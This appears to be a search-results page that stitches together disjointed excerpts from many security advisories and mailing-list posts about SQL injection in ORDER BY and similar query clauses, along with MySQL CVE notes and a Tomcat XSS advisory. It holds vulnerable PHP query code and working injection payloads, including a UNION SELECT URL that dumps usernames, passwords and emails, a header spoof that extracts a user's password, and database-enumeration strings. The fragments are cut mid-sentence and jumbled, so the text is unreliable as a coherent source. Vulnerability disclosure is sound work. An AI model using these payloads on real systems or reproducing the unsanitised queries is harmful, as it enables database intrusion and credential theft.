Next Page >>
ORDER BY
[..]
</values>
<filter>
<offset>0</offset>
<limit>60</limit>
<order_by>EVNTYPE asc</order_by>
<sql>(EVNTITLE LIKE '%SQL INJECTION TEST%' OR
EVNNOTE LIKE '%SQL INJECTION TEST%')
</sql>
</filter>
</item>
# sql injection vul code in 'kaibb/rss.php'
if ( isset($_GET['forum']))
{
$id = $secure->clean($_GET['forum']);
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '".$_GET['forum']."' ORDER BY id DESC LIMIT 15");
} else {
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}
# inc/function.php
example:
'having 1=1--
result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'.
or just a simple '
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'.
----
permalink.php, line 298:
$prevlink = mysql_query("SELECT PostID FROM ".POSTS_TBL." WHERE PostID<".$_GET['PostID']." AND Draft=0 ORDER BY Timestamp DESC LIMIT 1");
----
permalink.php, line 304:
$whichcategory = Trim($_POST['category']);
..
if ($whichcategory=='All'){
$query = "SELECT * FROM content ORDER BY id DESC";
}else{
$query = "SELECT * FROM content WHERE topic ='" . $whichcategory . "' ORDER BY id DESC";
}
$result = mysql_query($query);
..
$query = $db->query("
SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts
FROM ".TABLE_PREFIX."posts p
LEFT JOIN ".TABLE_PREFIX."forums f ON (f.fid=p.fid)
WHERE p.tid='$tid' AND p.pid IN($pidin)
ORDER BY dateline ASC
");
-------------------------------------------------------------------------------
It is obvious, that "$pids" argument will be used in sql query without any
sanitization. So sql injection security hole seems to exist here.
Impact: SQL injection
Description:
categories.php and other pages of php pro bid accept user-supplied
order-by and ASC/DESC fields.
The software prints helpful messages too:
SQL Query: SELECT a.auction_id, a.name, a.start_price, a.max_bid,
a.nb_bids, a.currency, a.end_time, a.closed, a.bold, a.hl,
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input, allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
The following URLs could be used to perform blind SQL injection
attacks:
"Source".
"\x01\x00\x00\x00\x05\x00\x00\x004\x00\x00\x00\x05\x00\x00\x00".
"Where".
"\x01".
"\x00\x00\x00\x05\x00\x00\x008\x00\x00\x00\x07\x00\x00\x00".
"OrderBy".
"\x01\x00".
"\x00\x00\x05\x00\x00\x00<\x00\x00\x00|\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00".
example:
'having 1=1--
Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)
Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.
or
'group by tblMain.fldArtNr having 1=1--
result:
>
> Proof of concept:
> -----------------
> 1) The get_terms() filter declared in the wp-includes/taxonomy.php file
> does not properly validate user input, allowing an attacker with
> "Editor" privileges to inject arbitrary SQL commands in the "orderby"
> and "order" parameters passed as array members to the vulnerable filter
> when sorting for example link categories.
>
> The following URLs could be used to perform blind SQL injection
> attacks:
}
else {
$max_results = 10;
}
..
$sql = "SELECT * FROM " . newsdb . " ORDER BY Date DESC LIMIT $from, $max_results ";
$sql_result = mysql_query($sql , $conn) or die ("Couldn't execute query.");
-----------------[ source code end ]-----------------------------------
As seen above there is SQL Injection in "LIMIT x,y" part of the SQL query.
This vulnerability differs from previous cases, because there is "ORDER BY"
before "LIMIT" in vulnerable SQL query. It renders common "UNION" attack method
Result:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near
'waraxe order by requests.request LIMIT 0,50' at line 1
Test 2:
http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
$whichcategory = Trim($_POST['category']);
..
if ($whichcategory=='All'){
$query = "SELECT * FROM content ORDER BY id DESC";
}else{
$query = "SELECT * FROM content WHERE topic ='" . $whichcategory . "' ORDER BY id DESC";
}
$result = mysql_query($query);
..
1.0.13 does not appear to be vulnerable to this.
$query = "SELECT text"
. "\n FROM #__poll_data"
. "\n WHERE pollid = " . (int) $pollid
. "\n ORDER BY id"
;
On 26 Sep 2007 19:09:17 -0000, security@soqor.net <security@soqor.net> wrote:
> Hello
* LOAD DATA INFILE did not check for SQL errors and sent an OK packet
even when errors were already reported. Also, an assert related to
client-server protocol checking in debug servers sometimes was raised
when it should not have been. (Bug#52512)
* Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY
(SELECT ... WHERE ...) could cause a server crash. (Bug#52711)
* The server could crash if there were alternate reads from two
indexes on a table using the HANDLER interface. (Bug#54007)
$this->_sort_arr['field'] = SQL_TITLE;
} else {
$ord = $this->_sort_arr['field'];
}
$order_sql = ' ORDER BY ' . $ord . ' ' . strtoupper($this->_sort_arr['direction']);
...
filters are inefficient, see COM_applyFilter() which calls COM_applyBasicFilter()
in /public/lib-common.php near line 5774.
#
# }
# else {
#
# $query .=" (INSTR(`title`, '$keywords[0]') > '0' || INSTR(`body`, '$keywords[0]') > '0' || ...)";} <--------INJECTION HERE
# $pquery=$query.';'; $query.=" ORDER BY mod_date DESC LIMIT $pg, $max;"; //echo $query;
#
# ...
#
# }
#
password of a registered user.
$id = (isset($_GET['id']) && $_GET['id'] !='') ? $_GET['id'] : getlastid();
$SQL = "SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC";
$resulted = $db->query($SQL, $querys);
while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;
> ############## SQL Search Vuln ###############
>
> The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server.
>
> SQL query:
> $signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");
>
> The $QUERY is what we submit through search box so injecting this will sql inject the server.
> The following is the sample sql injection example.
>
>
- Not vulnerable: ilch 1.1M
- Exploit: Spoof your x-forwarded-for header to:
127.0.0.1', (select `pass` from prefix_user WHERE `id` > 0
ORDER BY `id` LIMIT 1)) /*
Then create a guestbook entry.
- Timeline:
3.Feb.09: Vuln reported to ilch.de
Technical Details:
Normal input for the 'LngId' parameter contains a code such as ENG, DEU, JP, denoting the language type. This parameter is not properly validated and the injection of SQL statements within it allows attackers unrestricted access to enumerate information from the database. For example:
https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
Proof of Concept:
A Proof of Concept (RDdbenum.py) has been developed to automate enumeration of entire database content available from http://www.irmplc.com/Tools/RDdbenum.py
from two indexes on a table, which triggers an assertion failure
(CVE-2010-3681).
MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote
authenticated users to cause a denial of service (mysqld daemon crash)
by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY \(SELECT
... WHERE ...\)" statements, which triggers a NULL pointer dereference
in the Item_singlerow_subselect::store function (CVE-2010-3682).
MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when
a LOAD DATA INFILE request generates SQL errors, which allows remote
nGenuity Information Services - Security Advisory
Advisory ID: NGENUITY-2009-005 - OpenCart Order By Blind SQL Injection
Application: OpenCart 1.1.8
Vendor: OpenCart
Vendor website: http://www.opencart.com <http://www.chambermaster.com>
Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
I. BACKGROUND
"OpenCart is an open source PHP-based online shopping cart system. A robust e-commerce
SELECT pm.pmid, title, fromusername
FROM " . TABLE_PREFIX . "pmtext AS pmtext
LEFT JOIN " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
WHERE pm.userid = " . $vbulletin->userinfo['userid'] . "
AND pm.folderid = 0
ORDER BY dateline DESC
LIMIT 1");
$newpm['username'] =
addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
$newpm['title'] = addslashes_js(unhtmlspecialchars($newpm['title'],
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
CVE-2011-4075
Input passed to the "orderby" parameter in cmd.php (when "cmd" is set to
"query_engine", "query" is set to "none", and "search" is set to e.g.
"1") is not properly sanitised in lib/functions.php before being used in a
"create_function()" function call. This can be exploited to inject and
execute arbitrary PHP code.
/---------------------
$id = $_GET['p'];
$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY
comment_date DESC");
----------------------/
As you can see in the presented code, the value of $id is taken from
HTTP GET p variable and then $id is later used
inside the SQL Query of get_results method from the $wpdb object
- - Tomcat 5.5.x
- Not affected
Description:
The session list screen (provided by sessionList.jsp) in affected
versions uses the orderBy and sort request parameters without applying
filtering and therefore is vulnerable to a cross-site scripting attack.
Users should be aware that Tomcat 6 does not use httpOnly for session
cookies by default so this vulnerability could expose session cookies
from the manager application to an attacker.
A review of the Manager application by the Apache Tomcat security team
############## SQL Search Vuln ###############
The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server.
SQL query:
$signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");
The $QUERY is what we submit through search box so injecting this will sql inject the server.
The following is the sample sql injection example.
a server crash (CVE-2010-3680).
* The server could crash if there were alternate reads from two
indexes on a table using the HANDLER interface (CVE-2010-3681).
* Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY
(SELECT ... WHERE ...) could cause a server crash (CVE-2010-3682).
* During evaluation of arguments to extreme-value functions (such
as LEAST() and GREATEST()), type errors did not propagate properly,
causing the server to crash (CVE-2010-3833).
Next Page>>
|
